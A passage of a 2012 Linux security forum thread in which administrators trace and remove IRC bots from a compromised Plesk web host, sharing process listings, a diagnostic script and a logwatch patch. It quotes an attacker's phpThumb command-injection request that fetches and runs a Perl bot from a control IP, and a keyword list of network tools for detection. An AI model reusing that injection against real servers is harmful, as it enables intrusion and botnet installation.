LinuxQuestions.org
Help answer threads with 0 replies.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 03-28-2012, 05:03 PM   #16
ceyx
Member
 
Registered: May 2009
Location: Fort Langley BC
Distribution: Kubuntu,Free BSD,OSX,Windows
Posts: 342

Rep: Reputation: 59

of interest ? :

http://blog.spiderlabs.com/2011/12/h...-detected.html

BTW - I've found this thread really educational. It has been great peering over your shoulders !
 
1 members found this post helpful.
Old 03-29-2012, 11:20 AM   #17
krazybob
Member
 
Registered: Oct 2009
Location: Los Angeles, CA
Distribution: Centos 5.x
Posts: 133

Original Poster
Rep: Reputation: 3
ARGG!!! Good morning everyone!

Code:
[root@cis-secure ~]# lsof -i :6667
COMMAND  PID   USER   FD   TYPE    DEVICE SIZE NODE NAME
perl    9449 apache   90u  IPv4 632681114       TCP cis-secure.priorityonehost.net:45285->mail.cdconsultants.ca:ircd (SYN_SENT)

[root@cis-secure ~]# ls -l /proc/9449 | grep exe    
lrwxrwxrwx  1 apache apache 0 Mar 29 10:17 exe -> /usr/bin/perl
But where is the darn file(s)?
 
Old 03-29-2012, 11:26 AM   #18
krazybob
Member
 
Registered: Oct 2009
Location: Los Angeles, CA
Distribution: Centos 5.x
Posts: 133

Original Poster
Rep: Reputation: 3
What is this telling me???

Code:
[root@cis-secure task]# lsof -i :6667
COMMAND   PID   USER   FD   TYPE    DEVICE SIZE NODE NAME
perl    29843 apache   90u  IPv4 632695431       TCP cis-secure.priorityonehost.net:45351->b148.eboundhost.com:ircd (SYN_SENT)
[root@cis-secure task]# ls -l /proc/29843 | grep exe    
lrwxrwxrwx  1 apache apache 0 Mar 29 10:22 exe -> /usr/bin/perl
[root@cis-secure task]# cd /proc/29843
[root@cis-secure 29843]# ls -lah
total 0
dr-xr-xr-x    4 apache apache 0 Mar 29 10:22 .
dr-xr-xr-x  367 root   root   0 Mar 22 16:33 ..
-r--------    1 apache apache 0 Mar 29 10:23 auxv
-r--r--r--    1 apache apache 0 Mar 29 10:23 cmdline
-rw-r--r--    1 apache apache 0 Mar 29 10:23 coredump_filter
lrwxrwxrwx    1 apache apache 0 Mar 29 10:22 cwd -> /
-r--------    1 apache apache 0 Mar 29 10:23 environ
lrwxrwxrwx    1 apache apache 0 Mar 29 10:22 exe -> /usr/bin/perl
dr-x------    2 apache apache 0 Mar 29 10:22 fd
-r--r--r--    1 apache apache 0 Mar 29 10:23 io
-r--------    1 apache apache 0 Mar 29 10:23 limits
-r--r--r--    1 apache apache 0 Mar 29 10:23 maps
-rw-------    1 apache apache 0 Mar 29 10:23 mem
-r--r--r--    1 apache apache 0 Mar 29 10:23 mounts
-r--------    1 apache apache 0 Mar 29 10:23 mountstats
lrwxrwxrwx    1 apache apache 0 Mar 29 10:22 root -> /
-r--------    1 apache apache 0 Mar 29 10:23 smaps
-r--r--r--    1 apache apache 0 Mar 29 10:22 stat
-r--r--r--    1 apache apache 0 Mar 29 10:23 statm
-r--r--r--    1 apache apache 0 Mar 29 10:23 status
dr-xr-xr-x    3 apache apache 0 Mar 29 10:23 task
-r--r--r--    1 apache apache 0 Mar 29 10:23 wchan
[root@cis-secure 29843]#
Thank you in advance for your help.
 
Old 03-29-2012, 11:27 AM   #19
krazybob
Member
 
Registered: Oct 2009
Location: Los Angeles, CA
Distribution: Centos 5.x
Posts: 133

Original Poster
Rep: Reputation: 3
Quote:
Originally Posted by ceyx View Post
of interest ? :

http://blog.spiderlabs.com/2011/12/h...-detected.html

BTW - I've found this thread really educational. It has been great peering over your shoulders !
Now see, my ex-wife said I was worthless 8=)
 
Old 03-29-2012, 12:01 PM   #20
ktreese
LQ Newbie
 
Registered: Mar 2012
Posts: 7

Rep: Reputation: Disabled
what is the output of?
netstat -anlp
pstree -aup
lsof -p <pid> or use the switches unSpawn posted in his first reply

Last edited by ktreese; 03-29-2012 at 12:03 PM.
 
Old 03-29-2012, 12:47 PM   #21
ceyx
Member
 
Registered: May 2009
Location: Fort Langley BC
Distribution: Kubuntu,Free BSD,OSX,Windows
Posts: 342

Rep: Reputation: 59
Quote:
Originally Posted by krazybob View Post
Code:
/var/www/vhosts/brianbeckerle.com/statistics/logs/access_log.processed:87.98.219.50 - - [27/Dec/2011:02:48:27 -0800] "GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 1248 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
Possible scenario ?

Using a Wordpress Theme called "Comfy" or "Comfy-Plus"
it performs the following: downloads and saves a file in /tmp/f from "control IP", kills all unresponsive perl processes, and then reloads the bot

ls-l/tmp
wget-O/tmp/f 67.19.79.203/f
killall-9 perl
perl/tmp/f
phpThumbDebug=9

It it possible that the bot gets reloaded when someone clicks on Mr."BB"'s photos ?

Last edited by ceyx; 03-29-2012 at 12:58 PM. Reason: clarity
 
Old 03-29-2012, 06:55 PM   #22
krazybob
Member
 
Registered: Oct 2009
Location: Los Angeles, CA
Distribution: Centos 5.x
Posts: 133

Original Poster
Rep: Reputation: 3
The URL changes each time. It appears random. I checked and this particular domain has nothing in his crontab file.

Quote:
Originally Posted by ceyx View Post
Possible scenario ?

Using a Wordpress Theme called "Comfy" or "Comfy-Plus"
it performs the following: downloads and saves a file in /tmp/f from "control IP", kills all unresponsive perl processes, and then reloads the bot

ls-l/tmp
wget-O/tmp/f 67.19.79.203/f
killall-9 perl
perl/tmp/f
phpThumbDebug=9

It it possible that the bot gets reloaded when someone clicks on Mr."BB"'s photos ?
 
Old 03-29-2012, 07:11 PM   #23
krazybob
Member
 
Registered: Oct 2009
Location: Los Angeles, CA
Distribution: Centos 5.x
Posts: 133

Original Poster
Rep: Reputation: 3
Code:
tcp        0      1 65.44.220.71:51869          216.14.112.66:6667          SYN_SENT    29843/logs

[root@cis-secure ~]# lsof -p 29843     
COMMAND   PID   USER   FD   TYPE    DEVICE     SIZE      NODE NAME
perl    29843 apache  cwd    DIR      0,30     4096  36149898 /
perl    29843 apache  rtd    DIR      0,30     4096  36149898 /
perl    29843 apache  txt    REG      0,30    12548  36150438 /usr/bin/perl
perl    29843 apache  mem    REG      0,30    47404  36342490 /lib/libnss_files-2.3.4.so
perl    29843 apache  mem    REG      0,30    21164  36312388 /usr/lib/perl5/5.8.5/i386-linux-thread-multi/auto/Socket/Socket.so
perl    29843 apache  mem    REG      0,30    16816  36311948 /usr/lib/perl5/5.8.5/i386-linux-thread-multi/auto/IO/IO.so
perl    29843 apache  mem    REG      0,30  1526108  36342314 /lib/tls/libc-2.3.4.so
perl    29843 apache  mem    REG      0,30   105824  36342316 /lib/tls/libpthread-2.3.4.so
perl    29843 apache  mem    REG      0,30    14148  36342716 /lib/libutil-2.3.4.so
perl    29843 apache  mem    REG      0,30    26776  36342706 /lib/libcrypt-2.3.4.so
perl    29843 apache  mem    REG      0,30   211948  36342310 /lib/tls/libm-2.3.4.so
perl    29843 apache  mem    REG      0,30    15032  36342614 /lib/libdl-2.3.4.so
perl    29843 apache  mem    REG      0,30    95420  36342600 /lib/libnsl-2.3.4.so
perl    29843 apache  mem    REG      0,30    79376  36342282 /lib/libresolv-2.3.4.so
perl    29843 apache  mem    REG      0,30  1260104  36310138 /usr/lib/perl5/5.8.5/i386-linux-thread-multi/CORE/libperl.so
perl    29843 apache  mem    REG      0,30   110984  36342728 /lib/ld-2.3.4.so
perl    29843 apache    0r   CHR       1,3           36344202 /dev/null
perl    29843 apache    1w  FIFO       0,8          632695211 pipe
perl    29843 apache    2w   REG      0,30   201024  36346606 /var/log/httpd/error_log
perl    29843 apache    3u  IPv4 620198028                TCP *:http (LISTEN)
perl    29843 apache    4u  IPv4 620198030                TCP *:https (LISTEN)
perl    29843 apache    5r  FIFO       0,8          623903472 pipe
perl    29843 apache    6w  FIFO       0,8          623903472 pipe
perl    29843 apache    7w   REG      0,30   201024  36346606 /var/log/httpd/error_log
 
Old 03-31-2012, 07:45 AM   #24
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,394
Blog Entries: 55

Rep: Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565
I'll list commands to use and explain. I'll assert inside the VE the web server runs as UID 48.

The first goal is to come up with a clean list of PIDs to feed into 'lsof'.
Run 'ps' for the web server UID and list processes (this should only show "httpd"):
Code:
\ps -U 48 -o ppid,pid,sid,comm,args
* Note the backslash should keep any aliases from kicking in, "comm" and "args" are not equal (see 'man ps': "setproctitle"), the SID should make it easier to match children with their session leader and the PPID shows the parent as well.
Or see if any UID runs processes with "perl" in the name (returns a clean list of PIDs if any):
Code:
\ps -C perl -o pid --no-headers
Or check if a network connection is made to known IRC ports 6660-6669 (uncommon ports are 7000,7070,8000-8002):
Code:
\lsof -Pwlni | egrep "TCP.*->.*:(666[0-9])"|awk '{print $2}'
Having the PID you can list open files (example PID 9449):
Code:
lsof -Pwlnp 9449
and this will show the user the process runs as in the "USER" column, the current working directory ("cwd") and network connections (if any) along with the rest of the open files. As you can see from ktreese's example output the current working directory may hold clues.


Let's tie this together as a shell script you can run inside a VE (thanks to ktreese for explaining vz.* commands) as long as basic commands are available:
Code:
#!/bin/bash
_help() { echo "Script arg: OpenVZ VEID, exiting."; exit 1; }
[ $# -ne 1 ] && _help; case "$1" in [1-9]*) ;; *) _help;; esac
# PATH inside VE:
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:$PATH
# Required binaries:
for BINARY in ls ps cat find awk file xargs lsof mkdir; do which "${BINARY}" 2>/dev/null|| \
echo "Missing "${BINARY}", exiting."; exit 1; done
# Temp dir for deleted files storage:
MYTEMPDIR="/var/tmp"; umask 027
# Commence. Build PID list:
PIDLIST=$(\ps --no-headers -C perl -o pid; \lsof -Pwlni|egrep "TCP.*->.*:(666[0-9])"|awk '{print $2}')
[ ${#PIDLIST} -eq 0 ] && { echo "PID list empty, exiting."; exit 0; }
for CHKPID in $PIDLIST; do echo "Process nfo for PID ${CHKPID}: "
 \ps wwwe -p ${CHKPID} -o ppid,sid,pid,comm,args --no-headers; echo
 echo "Open files for PID ${CHKPID}: "; \lsof -Pwlnp ${CHKPID}; echo
 echo "Files in CWD of PID ${CHKPID}: "; \lsof -Pwlnp ${CHKPID} -a -d cwd|awk '/cwd/ {print $NF}'\
|while read CHKPIDDIR; do \ls --full-time --time-style=long-iso --quoting-style=c -altr "${CHKPIDDIR:=error}"
  \find "${CHKPIDDIR:=error}" -print0|xargs -0 -iX file 'X'; done; echo "Deleted files for PID ${CHKPID}: "
 mkdir "${MYTEMPDIR}/undel_${CHKPID}"|| { echo "Could not create "${MYTEMPDIR}/undel_${CHKPID}", exiting."; exit 1; }
 \lsof -Pwlnp ${CHKPID}|awk '/\deleted\)/ {print $2, $4, $NF}'|while read FPID FFID FFILE; do FFID=${FFID//[rwu]/}; 
FFILE=${FFILE//*\//}; [ -e "${MYTEMPDIR}/undel_${CHKPID}/${FFILE}" ] \
|| { cat /proc/${FPID}/fd/${FFID} > "${MYTEMPDIR}/undel_${CHKPID}/${FFILE}"; 
file "${MYTEMPDIR}/undel_${CHKPID}/${FFILE}"; }; done; done; exit 0
If you save this script on the hardware node as "/usr/local/bin/veinspect.sh" and make it executable then once you select the VEID to inspect you should be able to run it as 'vzctl runscript /usr/local/bin/veinspect.sh VEID'. It's not tested well and doesn't do error handling so as always YMMV(VM) but at least it's a start for providing details usable for analysis.
 
1 members found this post helpful.
Old 04-01-2012, 01:42 PM   #25
krazybob
Member
 
Registered: Oct 2009
Location: Los Angeles, CA
Distribution: Centos 5.x
Posts: 133

Original Poster
Rep: Reputation: 3
In following the various PID's and knowing ahead of time that this issue is largely related to Plesk and their public admission of a hack existing since v8.2 I was only slightly amazed when I entered the IP of http://216.14.112.66/.

It goes directly to a Plesk test page that appears as a place hold page and shows the customer that Perl, ASP, etc. are working. Some of us have already experiment with deleting the /test DIR on all sites. This appears to be the ingress.

Be careful that the customer has not put any of their files in the /cgi-bin/test DIR but it isn't likely. There are two /cgi-binb's. One for the main site above the root and one in/httpsdocs.

Code:
ls -lah /var/www/vhosts/*/cgi-bin/test/*
rm -fr /var/www/vhosts/*/cgi-bin/test

ls -lah /var/www/vhosts/*/httpsdocs/test/*
rm -fr /var/www/vhosts/*/httpsdocs/test
 
Old 04-01-2012, 04:17 PM   #26
leslie_jones
Member
 
Registered: Sep 2011
Posts: 130

Rep: Reputation: Disabled
Quote:
Originally Posted by unSpawn View Post
Logwatch (see for instance this web log post for extending its search capabilities).
There are three missing commas from the patch which break the http config for logwatch - please don't think I'm being pedantic. It's a compliment because obviously if I've noticed it, it's because I've used it :-)

Code:
--- http.orig 2012-03-28 00:00:01.000000000 +0000
+++ http      2012-03-28 00:00:02.000000000 +0000
@@ -334,6 +334,64 @@
    'shtml\.exe',
    'win\.ini',
    'xxxxxxxxxxxxxxxxxxxxxx',
+   '%20/tmp',
+   '%20/var',
+   '7z%20',
+   'apt-get%20',
+   'cat%20',
+   'cc%20',
+   'cd%20',
+   'crontab%20',
+   'curl%20',
+   'cvs%20',
+   'echo%20',
+   'elinks%20',
+   'emerge%20',
+   'ftp%20',
+   'GET%20',
+   'gcc%20',
+   'gzip%20',
+   'gunzip%20',
+   'HEAD%20',
+   'id%20',
+   'kill%20',
+   'killall%20',
+   'links%20',
+   'ls%20',
+   'lwp-download%20',
+   'lwp-request%20',
+   'lwp-mirror%20',
+   'lwp-rget%20',
+   'lynx%20',
+   'mail%20',
+   'mailx%20',
+   'mkdir%20',
+   'nc%20',
+   'ncftp%20',
+   'netcat%20',
+   'netstat%20',
+   'POST%20',
+   'perl%20',
+   'ps%20',
+   'python%20',
+   'rar%20',
+   'rexec%20',
+   'rm%20',
+   'rpm%20',
+   'ruby%20',
+   'scp%20',
+   'sh%20',
+   'smbclient%20',
+   'ssh%20',
+   'svn%20',
+   'tar%20',
+   'telnet%20',
+   'tftp%20',
+   'wget%20',
+   'uname%20',
+   'wget%20',
+   'whoami%20',
+   'yum%20',
 );
 
 #
I've added them above.
 
2 members found this post helpful.
Old 04-01-2012, 05:20 PM   #27
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,394
Blog Entries: 55

Rep: Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565Reputation: 3565
Quote:
Originally Posted by leslie_jones View Post
There are three missing commas from the patch which break the http config for logwatch
Thanks for pointing it out & fixing it!
 
1 members found this post helpful.
Old 04-02-2012, 03:59 AM   #28
leslie_jones
Member
 
Registered: Sep 2011
Posts: 130

Rep: Reputation: Disabled
Quote:
Originally Posted by unSpawn View Post
Thanks for pointing it out & fixing it!
Not at all. Thanks for the patch, really really useful that and most obliged to you.
 
Old 04-02-2012, 11:16 AM   #29
ktreese
LQ Newbie
 
Registered: Mar 2012
Posts: 7

Rep: Reputation: Disabled
Quote:
It goes directly to a Plesk test page that appears as a place hold page and shows the customer that Perl, ASP, etc. are working. Some of us have already experiment with deleting the /test DIR on all sites. This appears to be the ingress.
The existence of cgi-bin/test is not the means by which the attackers are exploiting the sites. The problem you are referencing is with a SQL injection vulnerability in admin/plib/api-rpc/Agent.php. Instead of explaining what happens to exposed servers, I'll link to this blog. Also note the comments section below pertaining to additional files under /tmp.

The hack we're discussing here, IMO, is not related to the documented Plesk API vulnerability.

Last edited by ktreese; 04-02-2012 at 12:20 PM. Reason: updated grammar and misspelled words
 
Old 04-03-2012, 06:15 PM   #30
ktreese
LQ Newbie
 
Registered: Mar 2012
Posts: 7

Rep: Reputation: Disabled
Quote:
Originally Posted by unSpawn View Post
Code:
#!/bin/bash
_help() { echo "Script arg: OpenVZ VEID, exiting."; exit 1; }
[ $# -ne 1 ] && _help; case "$1" in [1-9]*) ;; *) _help;; esac
# PATH inside VE:
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:$PATH
# Required binaries:
for BINARY in ls ps cat find awk file xargs lsof mkdir; do which "${BINARY}" 2>/dev/null|| \
echo "Missing "${BINARY}", exiting."; exit 1; done
# Temp dir for deleted files storage:
MYTEMPDIR="/var/tmp"; umask 027
# Commence. Build PID list:
PIDLIST=$(\ps --no-headers -C perl -o pid; \lsof -Pwlni|egrep "TCP.*->.*:(666[0-9])"|awk '{print $2}')
[ ${#PIDLIST} -eq 0 ] && { echo "PID list empty, exiting."; exit 0; }
for CHKPID in $PIDLIST; do echo "Process nfo for PID ${CHKPID}: "
 \ps wwwe -p ${CHKPID} -o ppid,sid,pid,comm,args --no-headers; echo
 echo "Open files for PID ${CHKPID}: "; \lsof -Pwlnp ${CHKPID}; echo
 echo "Files in CWD of PID ${CHKPID}: "; \lsof -Pwlnp ${CHKPID} -a -d cwd|awk '/cwd/ {print $NF}'\
|while read CHKPIDDIR; do \ls --full-time --time-style=long-iso --quoting-style=c -altr "${CHKPIDDIR:=error}"
  \find "${CHKPIDDIR:=error}" -print0|xargs -0 -iX file 'X'; done; echo "Deleted files for PID ${CHKPID}: "
 mkdir "${MYTEMPDIR}/undel_${CHKPID}"|| { echo "Could not create "${MYTEMPDIR}/undel_${CHKPID}", exiting."; exit 1; }
 \lsof -Pwlnp ${CHKPID}|awk '/\deleted\)/ {print $2, $4, $NF}'|while read FPID FFID FFILE; do FFID=${FFID//[rwu]/}; 
FFILE=${FFILE//*\//}; [ -e "${MYTEMPDIR}/undel_${CHKPID}/${FFILE}" ] \
|| { cat /proc/${FPID}/fd/${FFID} > "${MYTEMPDIR}/undel_${CHKPID}/${FFILE}"; 
file "${MYTEMPDIR}/undel_${CHKPID}/${FFILE}"; }; done; done; exit 0
I've run this script on one of the 'infected' containers. First, I made some adjustments by commenting out the 2nd and 3rd line of code to pass the VEID argument to the script as this is already handled by the vzctl command:

Code:
vzctl runscript <veid> veinspect.sh
If we ran this with passing an argument, it would fail since the container itself doesn't know that it's a container since all the runscript action is doing is executing whatever lines of code are inside the script we pass to it. As a matter of fact, vzctl may interpret it as another script to run following veinspect.sh. Anyway, continuing on.

I found that the script was exiting while checking for missing binaries, and would exit even if the binaries existed. It exits upon the first binary it checks for:

Code:
-bash-3.1# sh ./veinspect.sh 
/bin/ls
I assume we want to continue if the binary is found, so instead of messing with exclusive ors, I checked whether or not the command was successful or not:

Code:
for BINARY in ls ps cat find awk file xargs lsof mkdir; do which "${BINARY}" 2>/dev/null
if [ $? -ne 0 ]; then echo "Missing "${BINARY}", exiting."; exit 1; fi; done
This allows the script to get through to build the PID list. The output is heavy though because the cwd is /

In my case, it will always be / since we don't partition out /usr, /var, or any other file system. I'm letting the script run through its course now and will reply once it's finished and we'll see what's in /var/tmp.

The script has concluded:
Code:
-bash-3.1# ls -al /var/tmp
total 6
drwxrwxrwt  4 root   root   1024 Apr  3 18:16 .
drwxr-xr-x 21 root   root   1024 Jul 14  2008 ..
drwxr-xr-x  2 apache apache 1024 Mar 26 13:58 a
-rw-r--r--  1 apache apache 1082 Mar 26 13:42 a.tgz
drwxr-x---  2 root   root   1024 Apr  3 18:16 undel_31783
-bash-3.1# 
-bash-3.1# 
-bash-3.1# cd /var/tmp/undel_31783/
-bash-3.1# ls -al
total 2
drwxr-x--- 2 root root 1024 Apr  3 18:16 .
drwxrwxrwt 4 root root 1024 Apr  3 18:16 ..
-bash-3.1#
The a and a.tgz was from the intruder of course. I also see that the same PID is "responsible" for the perl script and the established connections to 6667, and therefore it runs the course twice:

Code:
-bash-3.1# PIDLIST=$(\ps --no-headers -C perl -o pid; \lsof -Pwlni|egrep "TCP.*->.*:(666[0-9])"|awk '{print $2}')
-bash-3.1# echo $PIDLIST
31783 31783

Last edited by ktreese; 04-03-2012 at 06:24 PM. Reason: script finished executing, so making addendum instead of another post
 
1 members found this post helpful.
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
how can i trace which process is creating these irc bots bangsters Linux - Security 13 10-04-2009 01:18 AM
irc fserv - irc file server rastiazul Linux - Software 0 10-16-2008 05:02 PM
LXer: How To Set Up An IRC Server And Anope IRC Services LXer Syndicated Linux News 0 02-02-2007 01:24 AM
worm.linuxday.com.br IRC bots? tek1024 Linux - Security 1 02-20-2005 01:43 AM
How speak irc client and irc server program? mech Linux - Networking 1 03-31-2004 06:23 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 02:31 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration